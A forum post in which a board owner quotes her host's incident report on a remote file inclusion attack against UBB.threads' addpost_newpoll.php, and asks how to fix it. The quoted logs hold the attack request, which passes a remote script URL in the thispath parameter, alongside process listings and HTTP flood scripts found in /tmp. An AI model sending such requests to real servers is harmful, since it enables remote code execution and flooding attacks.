Hello,
I recieved a message from my hosting company today informing me that the poll script on my board had been hacked. They shut down the processes and removed the dangerous files. However, they are requiring me to take action and fix this issue or they will discontinue my account. Beyond upgrading (which I cannot currently do as I need to renew my license) is there anything that can be done to fix this? Below are the details regarding the hack.
Thanks!
Charlene
The user 'mbtgd2' was running bad processes in the name
"/usr/local/apache/bin/httpd -DSSL". This was initiated by the php script
"addpost_newpoll.php". The hacker made use of the remote file execution
vulnerability with the php script
/home/mbtgd2/public_html/wwwthreads/addpost_newpoll.php to run a remote
script at
http://obemedia.com/c.arThe UBB.threads installation needs to be updated to correct this type of
vulnerability. That is, passing url values to php variables
[thispath=http://obemedia.com/c.ar?]
The customer needs to contact the software developer regarding this.
The details of the hack is as follows:
-------------------------
The processes run by the user:
mbtgd2 4666 0.0 0.2 15120 5988 ? S Apr07 0:00 /usr/bin/php
addpost_newpoll.php
mbtgd2 4668 0.0 0.0 0 0 ? Z Apr07 0:00 [sh]
<defunct>
mbtgd2 4674 96.3 0.1 6252 3200 ? R Apr07 1202:09
/usr/local/apache/bin/httpd -DSSL
mbtgd2 8482 0.0 0.2 15120 5988 ? S 06:29 0:00 /usr/bin/php
addpost_newpoll.php
mbtgd2 8490 0.0 0.0 0 0 ? Z 06:29 0:00 [sh]
<defunct>
mbtgd2 8498 95.9 0.1 6116 3196 ? R 06:29 120:11
/usr/local/apache/bin/httpd -DSSL
-------------------------
The details of attack vectors from the domain logs :
67.19.65.132 - - [08/Apr/2007:08:16:04 -0500] "GET
/wwwthreads/addpost_newpoll.php?addpoll=preview&thispath=http://obemedia.com/c.ar??
HTTP/1.1" 200 171651 "-" "libwww-perl/5.805"
72.29.76.202 - - [08/Apr/2007:08:19:07 -0500] "GET
/wwwthreads/addpost_newpoll.php?addpoll=preview&thispath=http://obemedia.com/c.ar??
HTTP/1.1" 200 169692 "-" "libwww-perl/5.805"
212.37.208.133 - - [08/Apr/2007:08:20:24 -0500] "GET
/wwwthreads/addpost_newpoll.php?addpoll=preview&thispath=http://obemedia.com/c.ar??
HTTP/1.1" 200 169496 "-" "libwww-perl/5.65"
-------------------------
Bad files in /tmp:
[~]# ll /tmp |grep mbtgd2
-rw-r--r-- 1 mbtgd2 mbtgd2 11745 Apr 8 08:20
sess_adav631df3a1ddfaa34s1x1wwo521459 ---> HTTP FLOOD SCRIPT
-rw-r--r-- 1 mbtgd2 mbtgd2 0 Apr 8 08:20
sess_fs4we18df3a1ddfaa34s1x1wwo521451
-rw-r--r-- 1 mbtgd2 mbtgd2 0 Apr 8 06:30
sess_fs6wi28df3a1ddfaa34s1x1wwo521451
-rw-r--r-- 1 mbtgd2 mbtgd2 11745 Apr 8 08:20
sess_rdav631df3a1ddfaa34s1x1wwo521459 ---> HTTP FLOOD SCRIPT
-------------------------
I have killed the processes, deleted bad files from /tmp and disabled the
php script /home/mbtgd2/public_html/wwwthreads/addpost_newpoll.php